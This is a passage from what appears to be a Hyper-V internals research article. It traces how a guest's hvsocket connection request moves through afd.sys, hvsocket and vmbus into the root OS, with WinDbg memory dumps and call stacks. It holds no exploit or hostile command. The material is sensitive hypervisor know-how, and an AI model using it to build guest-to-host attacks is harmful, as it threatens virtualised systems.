<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rdx = 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R8 = 23a9000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R9 = 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dd @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af000 00000001 3ba2286a 00000001 00000028</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af010 00000015 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af020 00000000 00000000 b1d00d3e 4570fe10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af030 487662ad 1b7a9d77 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x15 - CHANNELMSG_TL_CONNECT_REQUEST</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x28 – the size of the transferred message</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The message is sent, we return to hvsocket!VmbusTlXPartChildSetupConnection. hvsocket!VmbusTlPendConnect-> hvsocket! VmbusTlPendConnectLocked are caused. Return to hvsocket!vmbusTiSetupConnection, hvsocket! VmbusTlConnectQueueTimer is caused further (comes down to nt!KeSetTimer call, DPC is hvsocket! VmbusTlConnectTimeoutDpc). We come back to afd!AfdConnect, in eax - 103h therefore afd!AfdTLPendRequest is caused further and then afd! AfdTLConnectComplete2 (afd! AfdCloseConnection, afd! AfdFinishConnect+nt! IofCompleteRequest).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Exit from afd.sys</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS sent the message. Let's separately consider how the message sent through vmbus is processed. As is well-known from Hyper-V internals article, all messages sent through hvix!HvPostMessage hypercall, are processing by vmbus! ChReceiveChannelMessage. We put bp on this function in root OS and start ServerExample.exe in root OS, ClientExample.exe in guest OS, we stop. In rdx our message:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b2379f0 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b237a00 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b237a10 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There takes place validation of the message, the pointer to hvsocket!HvSocketProviderConnectNotification is loaded into rax. The buffer is allocated with the size 48h (Vnpi tag), netio!NetioInsertWorkQueue is caused with the hvsocket! VmbusTlConnectRequestWorkQueueRoutine parameter. Processing comes to the end on it.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Set bp on hvsocket!VmbusTlConnectRequestWorkQueueRoutine in root OS and restart the client application, there is a stop, go to hvsocket!VmbusTlProcessConnectRequestWorkItem, there are pointer to 3 GUIDs in rcx. </span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb880 6a964317 4a741d87 a646f9ab 0089049b – VM GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb890 b1d00d3e 4570fe10 487662ad 1b7a9d77 – Service GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb8a0 00000000 00000000 00000000 00000000 - HV_GUID_ZERO</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket! VmbusTlFindAndReferencePartition is caused with the 2nd HV_GUID_CHILDREN parameter, then hvsocket VmbusTlFindOrCreateService, then hvsocket!VmbusTlIsServiceEnabled (returns 1).</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check of the 3rd GUID on equality of HV_GUID_ZERO, if it true, nt!ExUuidCreate is caused, we receive GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm0:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm0=01cf5129 0c00cd83 11e745c8 da36f003</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlProcessNewConnection is caused. Next hvsocket!VmbusTlProcessNewConnectionForListener from which hvsocket!VmbusTlGetPartitionListenerEndpoint is caused (we receive an element from an AVL tree), then hvsocket!VmbusTlCreateConnection and hvsocket! VmbusTlAssociateConnectionToPartition, hvsocket! VmbusTlSetEndpointId.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further hvsocket!VmbusTlInsertObjectToTable</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffae08bfb058a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x048 CompareRoutine : 0xfffff804`602d16c0 _RTL_GENERIC_COMPARE_RESULTS hvsocket!VmbusTlCompareGuids+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x050 AllocateRoutine : 0xfffff804`602d1db0 void* hvsocket!VmbusTlAllocateForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x058 FreeRoutine : 0xfffff804`602d1dd0 void hvsocket!VmbusTlFreeForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x060 TableContext : 0x00000000`6e6f4350 Void</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After go to hvsocket!VmbusTlSetObjectCancellable and hvsocket!VmbusTlPendConnect, hvsocket! VmbusTlListenerProcessPendingIncomingConnection.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Return to NETIO! NetiopIoWorkItemRoutine.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In root OS at the same time:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!PncSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!XPartSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!ChSendOfferMessageLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………..WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………… WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 vmbusr!PipeStartChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmbusr!PipeOffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b hvsocket!VmbusTlXPartRootSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e hvsocket!VmbusTlListenerProcessPendingIncomingConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f hvsocket!VmbusTlProcessNewConnectionForListener</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 hvsocket!VmbusTlProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 hvsocket!VmbusTlProcessConnectRequestWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">22 hvsocket!VmbusTlConnectRequestWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">23 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">24 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">25 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">26 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">27 nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc @r8 @r8+@r9 – the message:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f30 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f40 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">487662ad 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0ec85988 11e74d2f .bvHw.z..Y../M..</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f50 0c00d483 01cf5129 00000000 00000000 ....)Q..........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f60 00000000 00000000 00002011 00000000 ......... ......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f70 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f80 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7f90 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fa0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fb0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fc0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7fe0 00000000 00000000 0000000b 000100ff ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`292c7ff0 0001000b 004e0079</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also the port is created:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">********** Bp winhvr!WinHvCreatePort ********</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
